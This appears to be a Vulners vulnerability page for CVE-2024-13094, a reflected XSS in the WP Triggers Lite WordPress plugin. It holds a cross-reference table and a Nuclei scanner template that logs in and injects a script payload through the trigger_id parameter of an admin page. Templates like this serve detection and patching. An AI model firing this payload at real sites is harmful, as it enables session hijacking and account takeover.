| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2024-13094 | 27 Jan 202506:16 | – | circl | |
| WordPress plugin WP Triggers Lite 安全漏洞 | 27 Jan 202500:00 | – | cnnvd | |
| CVE-2024-13094 | 27 Jan 202506:00 | – | cve | |
| CVE-2024-13094 WP Triggers Lite <= 2.5.3 - Reflected XSS | 27 Jan 202506:00 | – | cvelist | |
| EUVD-2024-51335 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-13094 | 27 Jan 202506:15 | – | nvd | |
| CVE-2024-13094 | 27 Jan 202506:15 | – | osv | |
| WordPress WP Triggers Lite plugin <= 2.5.3 - Reflected XSS vulnerability | 27 Jan 202523:29 | – | patchstack | |
| PT-2025-1993 | 27 Jan 202500:00 | – | ptsecurity | |
| CVE-2024-13094 | 23 May 202507:35 | – | redhatcve |
id: CVE-2024-13094
info:
name: WP Triggers Lite - Cross-Site Scripting
author: Sourabh-Sahu
severity: high
description: |
WP Triggers Lite WordPress plugin v2.5.3 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.
impact: |
Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
remediation: |
Update to the latest version of WP Triggers Lite plugin that addresses this issue or apply security patches if available.
reference:
- https://wpscan.com/vulnerability/7a75809e-824e-458e-bd01-50dadcea7713/
- https://nvd.nist.gov/vuln/detail/CVE-2024-13094
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
cvss-score: 7.1
cve-id: CVE-2024-13094
cwe-id: CWE-79
epss-score: 0.00555
epss-percentile: 0.42266
cpe: cpe:2.3:a:wptriggers:wp_triggers_lite:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: wptriggers
product: wp_triggers_lite
tags: cve,cve2024,wptriggers,wp-triggers-lite,authenticated,wordpress,wp,wp-plugin
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=
matchers:
- type: dsl
dsl:
- status_code == 302
- contains(header, "wordpress_logged_in")
internal: true
- raw:
- |
GET /wp-admin/admin.php?page=add-trigger&trigger_id=1"></script><script>alert(document.domain)</script><script>` HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "></script><script>alert(document.domain)</script><script>`","wp-triggers")
condition: and
# digest: 4a0a00473045022007bd3f5ddae530aab8e1f51160792e8df5ee374b6e495456269a19e0b72dd790022100efbbfa67a0457a6bb2d4662906cde4b143b0e2dce680bebcf89e8ecc7ce09491:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation